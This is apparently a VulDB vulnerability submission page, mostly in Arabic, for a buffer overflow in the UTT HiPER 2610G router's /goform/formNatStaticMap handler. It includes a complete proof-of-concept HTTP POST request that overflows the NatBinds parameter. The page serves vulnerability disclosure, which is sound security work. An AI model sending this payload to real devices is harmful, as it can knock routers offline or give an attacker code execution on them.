إرسال #836275: TUU HiPER 2610G <=v3.0.0-171107 Buffer Overflowالمعلومات

عنوانTUU HiPER 2610G <=v3.0.0-171107 Buffer Overflow
الوصفA critical overflow vulnerability exists in the UTT HiPER 2610G version v3.0.0-171107 router. By controlling parameters, attackers can send malicious HTTP post packets through the path /goform/formNatStaticMap to cause denial-of-service attacks and even arbitrary code execution, specifically through strcpy((char *)(InstPointByIndex + 232), s1_1); POST /goform/formNatStaticMap HTTP/1.1 Host: 192.168.1.1 Content-Length: 1822 Cache-Control: max-age=0 Authorization: Digest username="admin", realm="UTT", nonce="80758026511f147977ce8ea9363e038c", uri="/goform/formArpBindGlobalConfig", algorithm=MD5, response="3c90b3b4d198905f88cf1301ff8ad6b5", opaque="5ccc069c403ebaf9f0171e9517f40e41", qop=auth, nc=000001a1, cnonce="71e33390dc75c484" Origin: http://192.168.1.1 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.1/IPMac.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: language=zhcn; utt_bw_rdevType=; td_cookie=2522114788 Connection: close NatBinds=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
المصدر⚠️ https://github.com/HungryGoogle/log_attack/tree/main/index1
المستخدم
 liwenqing (UID 92587)
ارسال24/05/2026 12:15 AM (16 أيام منذ)
الاعتدال07/06/2026 05:57 PM (15 days later)
الحالةتمت الموافقة
إدخال VulDB369136 [UTT HiPER 2610G حتى 3.0.0-171107 /goform/formNatStaticMap strcpy NatBinds تلف الذاكرة]
النقاط20

التالي نظرة عامة السابق

Might our Artificial Intelligence support you?

Check our Alexa App!